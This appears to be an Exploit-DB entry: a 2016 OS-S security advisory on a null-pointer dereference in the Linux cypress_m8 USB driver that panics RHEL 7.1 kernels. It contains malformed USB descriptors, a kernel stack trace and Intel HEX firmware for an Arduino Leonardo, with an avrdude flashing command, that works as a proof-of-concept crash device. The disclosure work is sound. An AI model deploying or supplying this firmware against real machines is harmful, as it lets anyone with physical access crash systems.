:1007F000609170057091710540916E0550916F0583
:1008000064177507ACF49091E8009570E1F390914E
:10081000E80092FD1CC0A093F100A0917005B0917A
:1008200071051196AF73BB27AB2B11F48093E800D1
:10083000A0917005B09171051196B0937105A093C8
:1008400070052F5F3F4F3196CBCFC90102C08FEFAC
:100850009FEFDF91CF911F910F91FF9008951F920D
:100860000F920FB60F9211246F927F928F929F92E8
:10087000AF92BF92CF92DF92EF92FF920F931F93AE
:100880002F933F934F935F936F937F938F939F9398
:10089000AF93BF93EF93FF93CF93DF93CDB7DEB7C3
:1008A0006297DEBFCDBF1092E9008091E80083FF20
:1008B00046C168E0CE010A960E94C80382EF809389
:1008C000E8009A8597FF05C08091E80080FFFCCF83
:1008D00003C08EEF8093E800892F807609F023C152
:1008E0008B85811105C01092F1001092F10020C19A
:1008F000282F2D7F213009F41BC1853049F48091C8
:10090000E80080FFFCCF8C8580688093E30010C1F5
:10091000863009F0E1C02D8508891989223009F057
:10092000B3C0EC848E2D90E0209173053091740556
:10093000821793070CF09FC00E94D5031F92EF927D
:100940008DE394E09F938F930E9483068CE0E89E52
:1009500070011124E0917505F0917605EE0DFF1DF3
:1009600089E0DE01119601900D928A95E1F7C801A8
:100970000E94D50349E050E0BE016F5F7F4F80E0E9
:100980000E94E0030F900F900F900F90C12CD12C7C
:10099000612C712C33E7A32E34E0B32E4AEA842E67
:1009A00044E0942EE0917505F0917605EE0DFF1D63
:1009B000818590E0681679060CF0BAC07F926F923C
:1009C000BF92AF920E948306E0917505F091760583
:1009D000EE0DFF1D628573856C0D7D1D49E050E0B5
:1009E00080E00E94E0030F900F900F900F9000E0C6
:1009F00010E0E0917505F0917605EE0DFF1D028483
:100A0000F385E02DEC0DFD1D818590E00817190799
:100A10005CF51F930F939F928F920E948306E09143
:100A20007505F0917605EE0DFF1D0284F385E02D2E
:100A3000EC0DFD1DC801880F991FA485B585A80F71
:100A4000B91F4D915C910284F385E02DE80FF91FE9
:100A50006081718180E00E94E0030F5F1F4F0F9063
:100A60000F900F900F90C5CF8FEF681A780A8EE025
:100A7000C80ED11C97CF8FED94E09F938F930E9467
:100A800083060F900F9058C0C8012A8B0E94D5038F
:100A90002A892130C1F0233009F04EC08C851F9285
:100AA0008F9389EF94E09F938F930E94830642E097
:100AB00050E062E871E080E00E94E0030F900F9048
:100AC0000F900F9035C04091000150E060E071E060
:100AD00080E00E94E0032CC0873071F1883021F45F
:100AE00081E08093F10024C0893011F5937021F5E5
:100AF000EDE4F1E081E021E096E38093E9002093CA
:100B0000EB0034913093EC009093ED008F5F3196C1
:100B1000843099F78EE78093EA001092EA008C8582
:100B20008093720505C0888999890E94D50304C005
:100B30008EEF8093E80003C081E28093EB00629621
:100B40000FB6F894DEBF0FBECDBFDF91CF91FF91FE
:100B5000EF91BF91AF919F918F917F916F915F9135
:100B60004F913F912F911F910F91FF90EF90DF9048
:100B7000CF90BF90AF909F908F907F906F900F908D
:100B80000FBE0F901F9018951F920F920FB60F92E5
:100B900011248F939F938091E1001092E10083FFD5
:100BA0000FC01092E90091E09093EB001092EC00DE
:100BB00092E39093ED001092720598E09093F0000C
:100BC00082FF1AC080917E05882339F080917E05CE
:100BD000815080937E05882369F080917D0588236C
:100BE00059F080917D05815080937D05811104C06D
:100BF000289A02C05D9AF1CF9F918F910F900FBEFE
:100C00000F901F901895CF93DF93CDB7DEB782E199
:100C1000FE013596A0E0B1E001900D928A95E1F7D2
:100C20008F89988D9093760580937505898D9A8D1F
:100C300090937405809373058B8D9C8D90937C05A8
:100C400080937B058D8D9E8D90937A058093790599
:100C50008F8D98A1909378058093770510927205F7
:100C600081E08093D70080EA8093D80082E189BD3B
:100C700009B400FEFDCF61E070E080E090E00E94EA
:100C80007B0280E98093D8008CE08093E200109290
:100C9000E000559A209ADF91CF91089581E08093EA
:100CA000E00008959091C80095FFFCCF8093CE009E
:100CB00008951092CD0087E68093CC0088E1809360
:100CC000C9008EE08093CA0008950F931F93CF93BD
:100CD000DF93EC018C01FE0101900020E9F73197D0
:100CE000EC1BFD0BC8018C1B9D0B8E179F0730F46E
:100CF000F80181918F010E945206EDCFDF91CF91D3
:100D00001F910F910895CF93DF93CDB7DEB7DA959A
:100D10000FB6F894DEBF0FBECDBFFE01EB5FFE4FF6
:100D2000419151919F0160E071E0CE0101960E94D6
:100D30000707CE0101960E946506D3950FB6F89479
:100D4000DEBF0FBECDBFDF91CF9108958F929F92EE
:100D5000AF92BF92CF92DF92EF92FF920F931F93C9
:100D6000CF93DF9300D0CDB7DEB75B0122E535E04E
:100D70003F932F9389839A830E9483068981882ECB
:100D80009A81992E0F900F9000E010E08EE5E82EEA
:100D900085E0F82E91E1C92E94E0D92E0A151B05A5
:100DA000E4F4F40181914F0190E09F938F93FF92BF
:100DB000EF920E9483060F5F1F4FC8018F70992723
:100DC0000F900F900F900F90892B41F7DF92CF92E9
:100DD0000E9483060F900F90E1CF81E194E09F93F2
:100DE0008F930E9483060F900F900F900F90DF91CA
:100DF000CF911F910F91FF90EF90DF90CF90BF9018
:100E0000AF909F908F900895F8940C94E809AEE00D
:100E1000B0E0EDE0F7E00C94BF098C01CA0146E0B8
:100E20004C831A83098377FF02C060E070E8615049
:100E300071097E836D83A901BC01CE0101960E94D8
:100E400033074D815E8157FD0AC02F8138854217D7
:100E500053070CF49A01F801E20FF31F10822E964B
:100E6000E4E00C94DB09ACE0B0E0E9E3F7E00C94DB
:100E7000B1097C016B018A01FC0117821682838112
:100E800081FFBDC1CE0101964C01F7019381F601AE
:100E900093FD859193FF81916F01882309F4ABC184
:100EA000853239F493FD859193FF81916F018532ED
:100EB00029F4B70190E00E941B09E7CF512C312C97
:100EC00020E02032A0F48B3269F030F4803259F007
:100ED000833269F420612CC08D3239F0803339F4CB
:100EE000216026C02260246023C0286021C027FD25
:100EF00027C030ED380F3A3078F426FF06C0FAE00C
:100F00005F9E300D1124532E13C08AE0389E300DA1
:100F10001124332E20620CC08E3221F426FD6BC1C9
:100F2000206406C08C3611F4206802C0883641F473
:100F3000F60193FD859193FF81916F018111C1CFDE
:100F4000982F9F7D9554933028F40C5F1F4FFFE33B
:100F5000F9830DC0833631F0833771F0833509F0A2
:100F60005BC022C0F801808189830E5F1F4F44243B
:100F70004394512C540115C03801F2E06F0E711CDE
:100F8000F801A080B18026FF03C0652D70E002C08B
:100F90006FEF7FEFC5012C870E9410092C018301A0
:100FA0002C852F77222E17C03801F2E06F0E711CAE
:100FB000F801A080B18026FF03C0652D70E002C05B
:100FC0006FEF7FEFC5012C870E9405092C012C854E
:100FD0002068222E830123FC1BC0832D90E048163D
:100FE0005906B0F4B70180E290E00E941B093A94E0
:100FF000F4CFF50127FC859127FE81915F01B701B0
:1010000090E00E941B0931103A94F1E04F1A510808
:101010004114510471F7E5C0843611F0893639F571
:10102000F80127FF07C060817181828193810C5F85
:101030001F4F08C060817181882777FD8095982FA8
:101040000E5F1F4F2F76B22E97FF09C090958095A7
:10105000709561957F4F8F4F9F4F2068B22E2AE089
:1010600030E0A4010E944D09A82EA81844C085377D
:1010700029F42F7EB22E2AE030E025C0F22FF97F2E
:10108000BF2E8F36C1F018F4883579F0B4C08037A0
:1010900019F0883721F0AFC02F2F2061B22EB4FE97
:1010A0000DC08B2D8460B82E09C024FF0AC09F2F6D
:1010B0009660B92E06C028E030E005C020E130E09F
:1010C00002C020E132E0F801B7FE07C06081718103
:1010D000828193810C5F1F4F06C06081718180E027
:1010E00090E00E5F1F4FA4010E944D09A82EA81882
:1010F000FB2DFF77BF2EB6FE0BC02B2D2E7FA51428
:1011000050F4B4FE0AC0B2FC08C02B2D2E7E05C0E0
:101110007A2C2B2D03C07A2C01C0752C24FF0DC016
:10112000FE01EA0DF11D8081803311F4297E09C092
:1011300022FF06C07394739404C0822F867809F04E
:10114000739423FD13C020FF06C05A2C731418F4A7
:10115000530C5718732C731468F4B70180E290E0B5
:101160002C870E941B0973942C85F5CF731410F4FF
:10117000371801C0312C24FF12C0B70180E390E082
:101180002C870E941B092C8522FF17C021FF03C05A
:1011900088E590E002C088E790E0B7010CC0822F9C
:1011A000867859F021FD02C080E201C08BE227FD64
:1011B0008DE2B70190E00E941B09A51438F4B70135
:1011C00080E390E00E941B095A94F7CFAA94F4019F
:1011D000EA0DF11D8081B70190E00E941B09A1106A
:1011E000F5CF332009F451CEB70180E290E00E94A0
:1011F0001B093A94F6CFF7018681978102C08FEFE1
:101200009FEF2C96E2E10C94CD09FC010590615012
:1012100070400110D8F7809590958E0F9F1F08950C
:10122000FC016150704001900110D8F780959095B5
:101230008E0F9F1F08950F931F93CF93DF93182F47
:10124000092FEB018B8181FD03C08FEF9FEF20C041
:1012500082FF10C04E815F812C813D814217530770
:101260007CF4E881F9819F012F5F3F4F3983288308
:10127000108306C0E885F985812F0995892B29F708
:101280002E813F812F5F3F4F3F832E83812F902FF1
:10129000DF91CF911F910F910895FA01AA2728306D
:1012A00051F1203181F1E8946F936E7F6E5F7F4F33
:1012B0008F4F9F4FAF4FB1E03ED0B4E03CD0670FAF
:1012C000781F891F9A1FA11D680F791F8A1F911D02
:1012D000A11D6A0F711D811D911DA11D20D009F452
:1012E00068943F912AE0269F11243019305D319394
:1012F000DEF6CF010895462F4770405D4193B3E07D
:101300000FD0C9F7F6CF462F4F70405D4A3318F023
:10131000495D31FD4052419302D0A9F7EACFB4E0D4
:10132000A6959795879577956795BA95C9F700978C
:101330006105710508959B01AC010A2E069457952D
:10134000479537952795BA95C9F7620F731F841F84
:10135000951FA01D0895EE0FFF1F0590F491E02D3D
:1013600009942F923F924F925F926F927F928F9249
:101370009F92AF92BF92CF92DF92EF92FF920F9324
:101380001F93CF93DF93CDB7DEB7CA1BDB0B0FB62E
:10139000F894DEBF0FBECDBF09942A8839884888EB
:1013A0005F846E847D848C849B84AA84B984C88481
:1013B000DF80EE80FD800C811B81AA81B981CE0F78
:1013C000D11D0FB6F894DEBF0FBECDBFED0108955D
:0413D000F894FFCFBF
:1013D4001201000200000040AD0BEFBE000101024B
:1013E4000001220342006100640020004200410029
:1013F40042004500250078002500780025006E0095
:1014040025007000180342004100440020004300FE
:10141400300046004600450045002100120100024C
:10142400000000400D050901000101020301090249
:10143400270001010000FA0705810304040C0705D5
:10144400010204000C0705820104000C07000700D8
:101454000700480100500072006F006C00690066CC
:101464000069006300000A550000006BFD180A00C3
:10147400809F0AB901312B940A8101128946001315
:10148400000257028B0A5E0AF80A5F01F212010099
:1014940002010000400D055702000101020301B9D9
:1014A4000A0100F80A5F0A810A220342006100640B
:1014B400002000420041004200450025007800253C
:1014C40000780025006E00250070001803420041DA
:1014D400004400200043003000460046004500451B
:1014E40000210012010002010000400D0557020016
:1014F400010102030109040000030100000003F2DA
:101504000AEC0A0902270001010000FA01AB0A09EA
:101514000400000301000000090200202020202014
:101524005F5F5F5F5F5F5F5F2020202020202020BF
:1015340020202020202020202020202020202020A7
:1015440020205F5F5F5F5F205F5F20205F2020209F
:101554002020205F5F0A0D00202020202F205F5FC5
:101564005F5F2F202F5F20205F5F5F5F205F5F5FE3
:101574005F5F20205F5F5F5F5F20202020202F209F
:101584005F5F5F2F2F202F5F285F295F5F5F5F2FD3
:10159400202F5F5F0A0D002020202F202F202020E5
:1015A4002F205F5F205C2F205F5F20602F205F5F14
:1015B400205C2F205F5F5F2F5F5F5F5F205C5F5F5A
:1015C400205C2F205F5F2F202F205F5F5F2F202F55
:1015D4002F5F2F0A0D0020202F202F5F5F5F2F2009
:1015E4002F202F202F202F5F2F202F202F5F2F2001
:1015F400285F5F2020292F5F5F5F2F205F5F2F20F0
:101604002F202F5F2F202F202F5F5F2F202C3C0AAD
:101614000D0020205C5F5F5F5F2F5F2F202F5F2F07
:101624005C5F5F2C5F2F5C5F5F5F5F2F5F5F5F5F5F
:101634002F20202020202F5F5F5F5F2F5C5F5F2FB4
:101644005F2F5C5F5F5F2F5F2F7C5F7C0A0D002044
:101654003C3C2043485241534820414E59204F506E
:1016640045524154494E472053595354454D203E09
:101674003E0A0D00203C3C202863292053657267F4
:10168400656A20536368756D696C6F20323031353B
:101694002C204F70656E536F7572636520536563BC
:1016A40075726974792052616C66205370656E6E30
:1016B4006562657267203E3E0A0D000A3E3E205078
:1016C4007265737320627574746F6E20746F207307
:1016D4007461727420657865637574696F6E2E2EFB
:1016E4002E0A0D005B44454255475D2045786563ED
:1016F400757465207061796C6F616420300A0D0027
:10170400526563762D446174613A0A0D005B444569
:101714004255475D200953656E6420436F6E6669C8
:101724006775726174696F6E44657363726970740E
:101734006F720928696E6465783A2569292E2E2E00
:101744000D0A005B44454255475D200953656E64AC
:1017540020496E74657266616365204465736372C3
:101764006970746F720928696E7465726661636565
:101774003A2569292E2E2E0D0A005B444542554711
:101784005D200953656E6420456E64706F696E74E4
:101794002044657363726970746F720928656E649E
:1017A400706F696E743A2569292E2E2E0D0A005B1E
:1017B40044454255475D203C3C70616E6963206D31
:1017C4006F64653F3E3E0D0A005B44454255475DEC
:1017D4002009203E3E20537472696E67204465736D
:1017E40063726970746F72207265717565737420A9
:1017F4002D2073656E64696E67206D616C666F720F
:101804006D656420737472696E67212073657475E5
:10181400702E7756616C75654C203D3D2025690D11
:101824000A005B48455844554D505D0A0D0025306B
:041834003258200006
:00000001FF
--

646
platforms/linux/dos/39542.txt Executable file
View file

@ -0,0 +1,646 @@
OS-S Security Advisory 2016-07
Linux cypress_m8 Nullpointer Dereference
Date: March 4th, 2016
Authors: Sergej Schumilo, Hendrik Schwartke, Ralf Spenneberg
CVE: not yet assigned
CVSS: 4.9 (AV:L/AC:L/Au:N/C:N/I:N/A:C)
Title: Local RedHat Enterprise Linux DoS â?? RHEL 7.1 Kernel crashes on invalid
USB device descriptors (cypress_m8 driver)
Severity: Critical. The Kernel panics. A reboot is required.
Ease of Exploitation: Trivial
Vulnerability type: Wrong input validation
Products: RHEL 7.1 including all updates
Kernel-Version: 3.10.0-229.20.1.el7.x86_64 (for debugging-purposes we used the
CentOS Kernel kernel-debuginfo-3.10.0-229.14.1.el7)
Vendor: Red Hat
Vendor contacted: November, 12th 2015
PDF of Advisory: https://os-s.net/advisories/OSS-2016-07_cypress_m8.pdf
Abstract:
The Kernel 3.10.0-229.20.1.el7.x86_64 crashes on presentation of a buggy USB
device which requires the requiring the cypress_m8 driver.
Detailed product description:
We confirmed the bug on the following system:
RHEL 7.1
Kernel 3.10.0-229.20.1.el7.x86_64
Further products or kernel versions have not been tested.
How reproducible: Always
Actual results: Kernel crashes.
Description:
The bug was found using the USB-fuzzing framework vUSBf from Sergej Schumilo
(github.com/schumilo) using the following device descriptor:
[*] Device-Descriptor
bLength: 0x12
bDescriptorType: 0x1
bcdUSB: 0x200
bDeviceClass: 0x3
bDeviceSubClass: 0x0
bDeviceProtocol: 0x0
bMaxPacketSize: 0x40
idVendor: 0x4b4
idProduct: 0x5500
bcdDevice: 0x100
iManufacturer: 0x1
iProduct: 0x2
iSerialNumbers: 0x3
bNumConfigurations: 0x1
This is the configuration descriptor containing only one interrupt-endpoint-
descriptor (IN-direction).
The cypress_m8 driver assumes that there will be at least two endpoint-
descriptors configured for interrupt-transfer and each used for one direction.
Since there is no sanity check, it is possible that the kernel tries to
dereference a null-pointer.
This results in a crash of the system.
****
$ nm cypress_m8.ko.debug | grep cypress_generic_port_probe
00000000000008d0 t cypress_generic_port_probe
$ addr2line -e cypress_m8.ko.debug 0x9D0
/usr/src/debug/kernel-3.10.0-229.14.1.el7/linux-3.10.0-229.14.1.el7.x86_
64/drivers/usb/serial/cypress_m8.c:488
****
**** CentOS-Kernel linux-3.10.0-229.14.1.el7 (drivers/usb/serial/cypress_m8.c)
...
482 if (interval > 0) {
483 priv->write_urb_interval = interval;
484 priv->read_urb_interval = interval;
485 dev_dbg(&port->dev, "%s - read & write intervals forced to %d\n",
486 __func__, interval);
487 } else {
488 priv->write_urb_interval = port->interrupt_out_urb->interval; /*
possible null-pointer dereference */
489 priv->read_urb_interval = port->interrupt_in_urb->interval; /*
possible null-pointer dereference */
490 dev_dbg(&port->dev, "%s - intervals: read=%d write=%d\n",
491 __func__, priv->read_urb_interval,
492 priv->write_urb_interval);
493 }
...
****
[*] Configuration-Descriptor
bLength: 0x9
bDescriptorType: 0x2
wTotalLength: 0x27
bNumInterfaces: 0x1
bConfigurationValue: 0x1
iConfiguration: 0x0
bmAttributes: 0x0
bMaxPower: 0x31
[*] Interface-Descriptor
bLength: 0x9
bDescriptorType: 0x4
bInterfaceNumber: 0x0
bAlternateSetting: 0x0
bNumEndpoints: 0x3
bInterfaceClass: 0x0
bInterfaceSubClass: 0x0
bInterfaceProtocol: 0x0
[*] Endpoint-Descriptor:
bLength: 0x7
bDescriptorType: 0x5
bEndpointAddress: 0x81 ï?? IN-Direction
bmAttribut: 0x3 ï?? Interrupt-Transfer
wMaxPacketSize: 0x404
bInterval: 0xc
[*] Endpoint-Descriptor:
bLength: 0x7
bDescriptorType: 0x5
bEndpointAddress: 0x1 ï??OUT-Direction
bmAttribut: 0x2 ï??Bulk-Transfer
wMaxPacketSize: 0x4
bInterval: 0xc
[*] Endpoint-Descriptor:
bLength: 0x7
bDescriptorType: 0x5
bEndpointAddress: 0x82 ï??IN-Direction
bmAttribut: 0x1 ï??Bulk-Transfer
wMaxPacketSize: 0x4
bInterval: 0xc
Proof of Concept:
For a proof of concept, we are providing an Arduino Leonardo firmware file. This
firmware will emulate the defective USB device.
avrdude -v -p ATMEGA32u4 -c avr109 -P /dev/ttyACM0 -b 57600 -U
flash:w:binary.hex
The firmware has been attached to this bug report.
To prevent the automated delivery of the payload, a jumper may be used to
connect port D3 and 3V3!
Severity and Ease of Exploitation:
The vulnerability can be easily exploited. Using our Arduino Leonardo firmware,
only physical access to the system is required.
Vendor Communication:
We contacted Red Hat on the November, 12th 2015.
To this day, no security patch was provided by the vendor.
Since our 90-day Responsible Discourse deadline is expired, we publish this
Security Advisory.
References:
https://bugzilla.redhat.com/show_bug.cgi?id=1283368
Kernel Stacktrace:
[ 40.138619] usb 1-1: new full-speed USB device number 2 using xhci_hcd
[ 40.366581] usb 1-1: New USB device found, idVendor=04b4, idProduct=5500
[ 40.373039] usb 1-1: New USB device strings: Mfr=1, Product=2,
SerialNumber=3
[ 40.381857] usb 1-1: Product: Ä?
[ 40.385232] usb 1-1: Manufacturer: Ä?
[ 40.389227] usb 1-1: SerialNumber: %
[ 40.397815] usb 1-1: ep 0x81 - rounding interval to 64 microframes, ep desc
says 96 microframes
[ 40.457689] usbcore: registered new interface driver cypress_m8
[ 40.469365] usbserial: USB Serial support registered for DeLorme Earthmate
USB
[ 40.480135] usbserial: USB Serial support registered for HID->COM RS232
Adapter
[ 40.494974] usbserial: USB Serial support registered for Nokia CA-42 V2
Adapter
[ 40.502183] cypress_m8 1-1:1.0: HID->COM RS232 Adapter converter detected
[ 40.512683] BUG: unable to handle kernel NULL pointer dereference at
00000000000000a8
[ 40.513393] IP: [<ffffffffa03939d0>] cypress_generic_port_probe+0x100/0x1a0
[cypress_m8]
[ 40.513393] PGD 0
[ 40.513393] Oops: 0000 [#1] SMP
[ 40.513393] Modules linked in: cypress_m8(+) ip6t_rpfilter ip6t_REJECT
ipt_REJECT xt_conntrack ebtable_nat ebtable_broute bridge stp llc
ebtable_filter ebtables ip6table_nat nf_conntrack_ipv6 nf_defrag_ipv6
nf_nat_ipv6 ip6table_mangle ip6table_security ip6table_raw ip6table_filter
ip6_tables iptable_nat nf_conntrack_ipv4 nf_defrag_ipv4 nf_nat_ipv4 nf_nat
nf_conntrack iptable_mangle iptable_security iptable_raw iptable_filter
ip_tables bochs_drm ppdev syscopyarea sysfillrect sysimgblt ttm drm_kms_helper
drm pcspkr i2c_piix4 i2c_core serio_raw parport_pc parport xfs libcrc32c
sd_mod sr_mod crc_t10dif cdrom crct10dif_common ata_generic pata_acpi ata_piix
libata e1000 floppy dm_mirror dm_region_hash dm_log dm_mod
[ 40.513393] CPU: 0 PID: 2220 Comm: systemd-udevd Not tainted
3.10.0-229.14.1.el7.x86_64 #1
[ 40.513393] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS
rel-1.8.2-0-g33fbe13 by qemu-project.org 04/01/2014
[ 40.513393] task: ffff88000bcfa220 ti: ffff88000bd20000 task.ti: ffff88000bd20000
[ 40.513393] RIP: 0010:[<ffffffffa03939d0>] [<ffffffffa03939d0>]
cypress_generic_port_probe+0x100/0x1a0 [cypress_m8]
[ 40.513393] RSP: 0018:ffff88000bd238d0 EFLAGS: 00010246
[ 40.513393] RAX: 0000000000000000 RBX: ffff88000c5149c0 RCX: ffff88000bd23fd8
[ 40.513393] RDX: 0000000000000000 RSI: ffffffff81447840 RDI: ffff88000aeff040
[ 40.513393] RBP: ffff88000bd238f0 R08: 0000000000000000 R09: ffff88000fc16380
[ 40.513393] R10: ffffea000030eb00 R11: ffffffff8141968b R12: ffff88000bcd3800
[ 40.513393] R13: 0000000000000000 R14: ffff88000bcd3ab0 R15: ffffffffa0396200
[ 40.513393] FS: 00007fb8082b4880(0000) GS:ffff88000fc00000(0000)
knlGS:0000000000000000
[ 40.513393] CS: 0010 DS: 0000 ES: 0000 CR0: 000000008005003b
[ 40.513393] CR2: 00000000000000a8 CR3: 000000000c572000 CR4:
00000000000006f0
[ 40.513393] DR0: 0000000000000000 DR1: 0000000000000000 DR2:
0000000000000000
[ 40.513393] DR3: 0000000000000000 DR6: 00000000ffff0ff0 DR7: 0000000000000400
[ 40.513393] Stack:
[ 40.513393] ffff88000bcd3ab0 ffff88000bcd3800 ffff88000bcd3800 ffffffffa0396200
[ 40.513393] ffff88000bd23910 ffffffffa0393b04 ffff88000bcd3ab0 0000000000000000
[ 40.513393] ffff88000bd23940 ffffffff81461cf6 ffff88000bcd3ab0 ffff88000bcd3ab0
[ 40.513393] Call Trace:
[ 40.513393] [<ffffffffa0393b04>] cypress_hidcom_port_probe+0x14/0x80
[cypress_m8]
[ 40.513393] [<ffffffff81461cf6>] usb_serial_device_probe+0x56/0x110
[ 40.513393] [<ffffffff813d30d7>] driver_probe_device+0x87/0x390
[ 40.513393] [<ffffffff813d33e0>] ? driver_probe_device+0x390/0x390
[ 40.513393] [<ffffffff813d341b>] __device_attach+0x3b/0x40
[ 40.513393] [<ffffffff813d0f1b>] bus_for_each_drv+0x6b/0xb0
[ 40.513393] [<ffffffff813d2fd8>] device_attach+0x88/0xa0
[ 40.513393] [<ffffffff813d22d8>] bus_probe_device+0x98/0xc0
[ 40.513393] [<ffffffff813cfd64>] device_add+0x4c4/0x7a0
[ 40.513393] [<ffffffff81460243>] usb_serial_probe+0x1123/0x1230
[ 40.513393] [<ffffffff812d649c>] ? ida_get_new_above+0x7c/0x2a0
[ 40.513393] [<ffffffff811aba6a>] ? kmem_cache_alloc+0x1ba/0x1d0
[ 40.513393] [<ffffffff8123e5b2>] ? sysfs_addrm_finish+0x42/0xe0
[ 40.513393] [<ffffffff8123e391>] ? __sysfs_add_one+0x61/0x100
[ 40.513393] [<ffffffff8141dc04>] usb_probe_interface+0x1c4/0x2f0
[ 40.513393] [<ffffffff813d30d7>] driver_probe_device+0x87/0x390
[ 40.513393] [<ffffffff813d34b3>] __driver_attach+0x93/0xa0
[ 40.513393] [<ffffffff813d3420>] ? __device_attach+0x40/0x40
[ 40.513393] [<ffffffff813d0e43>] bus_for_each_dev+0x73/0xc0
[ 40.513393] [<ffffffff813d2b2e>] driver_attach+0x1e/0x20
[ 40.513393] [<ffffffff8145ec4b>] usb_serial_register_drivers+0x29b/0x580
[ 40.513393] [<ffffffffa0399000>] ? 0xffffffffa0398fff
[ 40.513393] [<ffffffffa039901e>] usb_serial_module_init+0x1e/0x1000
[cypress_m8]
[ 40.513393] [<ffffffff810020e8>] do_one_initcall+0xb8/0x230
[ 40.513393] [<ffffffff810dd0ee>] load_module+0x133e/0x1b40
[ 40.513393] [<ffffffff812f7d60>] ? ddebug_proc_write+0xf0/0xf0
[ 40.513393] [<ffffffff810d96b3>] ? copy_module_from_fd.isra.42+0x53/0x150
[ 40.513393] [<ffffffff810ddaa6>] SyS_finit_module+0xa6/0xd0
[ 40.513393] [<ffffffff81614389>] system_call_fastpath+0x16/0x1b
[ 40.513393] Code: 03 e1 41 c7 84 24 38 01 00 00 00 01 00 00 5b 41 5c 44 89
e8 41 5d 41 5e 5d c3 90 49 8b 84 24 78 01 00 00 4d 8d b4 24 b0 02 00 00 <44>
8b 88 a8 00 00 00 44 89 4b 34 49 8b 84 24 58 01 00 00 44 8b
[ 40.513393] RIP [<ffffffffa03939d0>] cypress_generic_port_probe+0x100/0x1a0
[cypress_m8]
[ 40.513393] RSP <ffff88000bd238d0>
[ 40.513393] CR2: 00000000000000a8
[ 41.005529] ---[ end trace b239663354a1c556 ]---
[ 41.010284] Kernel panic - not syncing: Fatal exception
[ 41.011253] drm_kms_helper: panic occurred, switching back to text console
Arduino Leonardo Firmware:
:100000000C94A8000C94C5000C94C5000C94C50079
:100010000C94C5000C94C5000C94C5000C94C5004C
:100020000C94C5000C94C5000C94C4050C942F04CA
:100030000C94C5000C94C5000C94C5000C94C5002C
:100040000C94C5000C94C5000C94C5000C94C5001C
:100050000C94C5000C94C5000C94C5000C940E02C1
:100060000C94C5000C94C5000C94C5000C94C500FC
:100070000C94C5000C94C5000C94C5000C94C500EC
:100080000C94C5000C94C5000C94C5000C94C500DC
:100090000C94C5000C94C5000C94C5000C94C500CC
:1000A0000C94C5000C94C5000C94C5000B030E0302
:1000B000010305032F032F032F03120316031A0353
:1000C000200324032F032A030000000200080E006F
:1000D00000030401000B000000000000000000000D
:1000E00000000000000004080201104080401020C1
:1000F00040804080080204018040201002011080EE
:100100001020404004040404040304050202020217
:1001100004030202020206060606060604040202A0
:100120000204000000002300260029002C002F00FC
:1001300000000000250028002B002E0031000000E8
:100140000000240027002A002D00300000C180811B
:1001500011241FBECFEFDAE0DEBFCDBF15E0A0E077
:10016000B1E0E4EDF3E102C005900D92A436B107D1
:10017000D9F725E0A4E6B5E001C01D92AF37B2077C
:10018000E1F70E94C8000C9404070C940000089545
:10019000CF93DF93CDB7DEB7CD59D1090FB6F89421
:1001A000DEBF0FBECDBF0E94A1020E94C70060E06B
:1001B00083E00E94300361E087E00E94300361E049
:1001C00088E00E9430030E9459067E012AE9E20E6F
:1001D000F11C84E093E0D70111969C938E9389E003
:1001E00094E013969C938E93129782E2E2E1F1E001
:1001F0009E012F5F3F4F6901D90101900D928A95B1
:10020000E1F788E1E4E3F1E0DE01939601900D92DD
:100210008A95E1F782E1ECE4F1E0DE01DB96019002
:100220000D928A95E1F789E0EEE5F1E0DE01A05953
:10023000BF4F01900D928A95E1F72A593F4F99E0FF
:10024000992ED901E92D1D92EA95E9F78E010957FA
:100250001F4F87E0E7E6F1E0D80101900D928A9503
:10026000E1F7BE0160587F4F87E0EEE6F1E0DB0189
:1002700001900D928A95E1F7AE0147585F4F87E0F4
:10028000E5E7F1E0DA0101900D928A95E1F75E0170
:10029000FEE8AF0EB11C86E0ECE7F1E0D50101907D
:1002A0000D928A95E1F7CE01835B9F4FEEE0DC0172
:1002B0001D92EA95E9F7E3E0DC011996EC93D90188
:1002C0009C92F4E01196FC9311971496EC93F9012B
:1002D000DC01292D01900D922A95E1F7FE01EC56E3
:1002E000FF4FDC011B96FC93EE931A971D96BC9270
:1002F000AE921C971183008373836283558344837A
:100300000C5211092CE0F80111922A95E9F721E02D
:10031000D80119962C931997FE01E059FF4F0190CF
:100320000D929A94E1F7F8019387828761E088E063
:100330000E9469038BE492E00E94650688E892E0DF
:100340000E94650687EC92E00E94650686E093E0D5
:100350000E94650682E493E00E9465068FE793E0C1
:100360000E94650684EA93E00E9465068BEE93E0A6
:100370000E94650683E00E949F03892B09F047C015
:100380005E01F3E2AF0EB11C8824839482E1982EC3
:1003900084E194E00E946506BF92AF92DF92CF9213
:1003A000FF92EF921F928F921F930F932DB73EB73C
:1003B000225131090FB6F8943EBF0FBE2DBFADB725
:1003C000BEB71196FE01FB96892D01900D928A957C
:1003D000E1F78DE695E00E94030668E873E180E0AE
:1003E00090E00E947B028DE695E00E944E0660E060
:1003F00087E00E94690368E873E180E090E00E9472
:100400007B020FB6F894DEBF0FBECDBFC1CF6AE04E
:1004100070E080E090E00E947B02ACCF1F920F92D0
:100420000FB60F9211242F933F938F939F93AF9307
:10043000BF938091650590916605A0916705B09185
:1004400068053091640523E0230F2D3720F40196D1
:10045000A11DB11D05C026E8230F0296A11DB11DE7
:10046000209364058093650590936605A0936705C6
:10047000B09368058091690590916A05A0916B051C
:10048000B0916C050196A11DB11D809369059093F3
:100490006A05A0936B05B0936C05BF91AF919F91D6
:1004A0008F913F912F910F900FBE0F901F90189535
:1004B0003FB7F8948091690590916A05A0916B050A
:1004C000B0916C0526B5A89B05C02F3F19F0019689
:1004D000A11DB11D3FBF6627782F892F9A2F620F6C
:1004E000711D811D911D42E0660F771F881F991FA6
:1004F0004A95D1F70895CF92DF92EF92FF92CF9372
:10050000DF936B017C010E945802EB01C114D104FE
:10051000E104F10479F00E9458026C1B7D0B683EE7
:100520007340A0F381E0C81AD108E108F108C8516E
:10053000DC4FECCFDF91CF91FF90EF90DF90CF9029
:100540000895789484B5826084BD84B5816084BD4B
:1005500085B5826085BD85B5816085BDEEE6F0E03C
:10056000808181608083E1E8F0E010828081826098
:100570008083808181608083E0E8F0E08081816019
:100580008083E1E9F0E08081826080838081816006
:100590008083E0E9F0E0808181608083E1ECF0E03D
:1005A000808184608083808182608083808181609B
:1005B0008083E3ECF0E0808181608083E0ECF0E018
:1005C000808182608083E2ECF0E0808181608083C2
:1005D000EAE7F0E0808184608083808182608083AC
:1005E000808181608083808180688083089590E02D
:1005F000FC013197EE30F10590F5EA5AFF4F0C946B
